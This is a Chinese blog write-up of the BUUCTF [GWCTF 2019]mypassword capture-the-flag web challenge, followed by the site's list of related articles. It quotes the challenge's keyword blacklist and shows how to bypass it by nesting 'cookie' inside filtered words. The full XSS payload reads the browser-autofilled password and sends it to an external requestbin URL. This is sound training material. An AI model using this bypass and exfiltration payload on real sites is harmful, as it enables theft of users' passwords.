BUUCTF--[GWCTF 2019]mypassword

最新推荐文章于 2023-09-05 09:30:41 发布
最新推荐文章于 2023-09-05 09:30:41 发布
阅读量671 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46263951/article/details/118737246
版权

 在login页面我们可以看到一个login.js文件,通过里面的代码我们可以知道这里会把当前用户的用户名和密码填入表单

 注册账号后看到提示,所以这个不是注入的题 

 然后在feedback页面发现这样一段注释,
这个过滤是把关键词替换成了空格,并且一个关键字只检查一遍,所以我们可以构造形如incookieput,这样结果就是input

<!-- 
            if(is_array($feedback)){
                echo "<script>alert('反馈不合法');</script>";
                return false;
            }
            $blacklist = ['_','\'','&','\\','#','%','input','script','iframe','host','onload','onerror','srcdoc','location','svg','form','img','src','getElement','document','cookie'];
            foreach ($blacklist as $val) {
                while(true){
                    if(stripos($feedback,$val) !== false){
                        $feedback = str_ireplace($val,"",$feedback);
                    }else{
                        break;
                    }
                }
            }
            -->

综上,我们可以利用feedback页面提交我们所构造的表单来获取flag

 利用http://http.requestbin.buuoj.cn/平台(requestbin提供了一个URL,改URL将收集对其发出的请求,首页点击create a requestbin)
构造表单

<incookieput type="text" name="username">
<incookieput type="password" name="password">
<scrcookieipt scookierc="./js/login.js"></scrcookieipt>
<scrcookieipt>
    var psw = docucookiement.getcookieElementsByName("password")[0].value;
    docucookiement.locacookietion="http://http.requestbin.buuoj.cn/1a5ujib1/?a="+psw;
</scrcookieipt>

在feedback页面提交后返回requestbin平台查看得到的反馈即可得到flag

Uzero.
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[BUUCTF][GWCTF 2019]mypassword
m0_52587327的博客
04-26 301
文章目录知识点解题过程学习参考 知识点 csrf requestbin使用(外带数据,即命令注入无回显时如何得到执行结果) 解题过程 注册登录 这里加载了一个js文件 payload: 60d487b4-04d2-4e33-9aad-fbe0264c5ac6.node3.buuoj.cn**/js/login.js** 得到一串js代码 if (document.cookie && document.cookie != '') { var cookies = document.coo
sql-server驱动包
最新发布
03-07
sql-server驱动包
[GWCTF 2019]mypassword
shinygod的博客
09-18 476
知识点:xss
buu刷题(第一周)
qq_62046696的博客
03-01 788
create_function直接执行,里面是有eval所以需要让create_function的函数名()引用一下来执行,下面的是不可能爆破成功了,然后create_function()这个函数的漏洞,他create之后会自动生成一个函数名为%00lambda_[0-999]我们可以爆破。
crypto-js.zip
02-22
var password = "mypassword"; var salt = CryptoJS.lib.WordArray.random(16); var derivedKey = CryptoJS.PBKDF2(password, salt, { keySize: 128/32, iterations: 1000 }); ``` **5. 使用场景** `crypto-js`在...
logstash-output-jdbc.zip
08-31
jdbc_password => "mypassword" statement => "INSERT INTO mytable (field1, field2) VALUES (?, ?)" } } ``` 在上面的例子中,`jdbc_driver_library` 指定 JDBC 驱动的位置,`jdbc_driver_class` 是数据库驱动...
mysql-connector-java.rar
06-17
String password = "mypassword"; Connection conn = DriverManager.getConnection(url, user, password); ``` 4. **执行 SQL**:创建 `Statement` 或 `PreparedStatement` 对象来执行 SQL 查询。`...
sqljdbc4-4.0.zip
06-02
String password = "myPassword"; try { Class.forName("com.microsoft.sqlserver.jdbc.SQLServerDriver"); Connection conn = DriverManager.getConnection(url, username, password); System.out.println(...
BUUCTF__[GWCTF 2019]mypassword_题解
风过江南乱的博客
04-29 880
BUUCTF__[GWCTF 2019]mypassword_题解 XSS获取admin cookie
[GWCTF 2019]mypassword-做题记录
cjdgg的博客
03-13 407
[GWCTF 2019]mypassword-做题思路学习 这题给了个朴实无华的登陆界面,有注册登录界面那肯定得试试sql注入,很遗憾没有试出来。 那就找找源代码看看有没有有价值的东西 只发现加载了一个login.gs,emem还是没发现有什么能用的,没办法那就注册一个号登录进去看看吧 登录进去主页面会有你的用户名可控,我就想会不会有啥ssti或者搞些标签进去,结果可想而知,<,>,{,},’,"这些符号应该被过滤了,那这题就不是这么玩的 去看看别的页面,feedback.php这里应
[GWCTF 2019]mypassword XSS
qq_54929891的博客
06-22 398
放假
BUUCTF:[GWCTF 2019]mypassword
末初的CSDN博客
04-06 2026
注册登录 这里加载了一个js文件 60d487b4-04d2-4e33-9aad-fbe0264c5ac6.node3.buuoj.cn/js/login.js if (document.cookie && document.cookie != '') { var cookies = document.cookie.split('; '); var cookie = {};...
buuctf crypto [password]解题记录
jsbbd12的博客
09-05 303
buuctf 密码学刷题记录
自建XSS平台与BUUCTF[GWCTF 2019]mypassword
qq_41755084的博客
08-09 351
从这里创建网站,将xss平台文件拷贝到phpstudy平台安装目录的www目录下,然后在根目录里设定为xss平台文件所在的目录。这里就需要后台机器人先在两个输入框里输入账号密码,然后把这两个值存入cookie,然后读取其中的一个值,这个利用条件我感觉有点苛刻,但是不管,先试试再说。接下来需要将本地的xss平台服务映射到有公网ip的服务器上,这样靶机访问公网ip的服务器时就相当于访问本地的xss平台,完成攻击目的。启动后,访问目标服务器的7500端口,输入展示板的账号密码,应该就可以看到frp服务的展板了。
CTF——web个人总结
热门推荐
recover517的博客
05-28 1万+
包含个人总结的解题思路、注入思路、文件包含思路、源码审计思路等
sqoop fetch-size
06-12
Sqoop fetch-size是用于设置Sqoop导入数据时的每次获取数据的大小。它指定了从数据源读取数据的行数,然后将这些行作为一个批次传输到目标数据库。通过设置适当的fetch-size,可以提高Sqoop导入数据的效率,减少网络流量和数据库负载。默认情况下,fetch-size的值为1000。可以通过使用Sqoop命令行选项"--fetch-size"来设置fetch-size的值,例如:sqoop import --connect jdbc:mysql://localhost/mydatabase --username myuser --password mypassword --table mytable --fetch-size 5000。这将设置fetch-size为5000,表示每次从数据源读取5000行数据。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值